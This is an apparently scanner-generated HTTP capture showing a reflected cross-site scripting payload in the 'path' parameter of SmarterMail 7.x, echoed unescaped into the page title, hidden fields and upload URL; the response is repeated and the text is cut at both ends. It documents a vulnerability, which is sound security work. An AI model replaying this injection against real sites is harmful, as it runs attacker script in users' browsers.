Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 910
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTARGUMENT=3&__EVENTTARGET=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d&+ uploaderId + '_' + inputCount + '_name=%2b+plupload.xmlEncode(file.name)+%2b&+ uploaderId + '_' + inputCount + '_status=%2b+(file.status+%3d%3d+plupload.DONE+%3f+'done'+%3a+'failed')+%2b&+ uploaderId + '_' + inputCount + '_tmpname=%2b+plupload.xmlEncode(file.target_name)+%2b&ctl00$MPH$domainField=hoytllc.com&ctl00$MPH$pathField=Root+Folder%5c&ctl00$MPH$uploadValidationToken=def234bfb6a5429880f5ef74e1fe9c71&ctl00$MPH$userField=dummy&ctl00_MPH_FilesGrid_HiddenInput=3&ctl00_MPH_FilesGrid_HiddenLSR=3
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:10:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6375
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0014AA)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxNEFBKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZPmcEjhL3qcwr0qjNikvuto981Cg" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0014AA)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="fcb7a187220340cd82a1169383a7373f" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x0014AA)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=fcb7a187220340cd82a1169383a7373f&pathField='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:10:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6375
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0014AA)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxNEFBKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZPmcEjhL3qcwr0qjNikvuto981Cg" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0014AA)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="fcb7a187220340cd82a1169383a7373f" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x0014AA)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=fcb7a187220340cd82a1169383a7373f&pathField='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
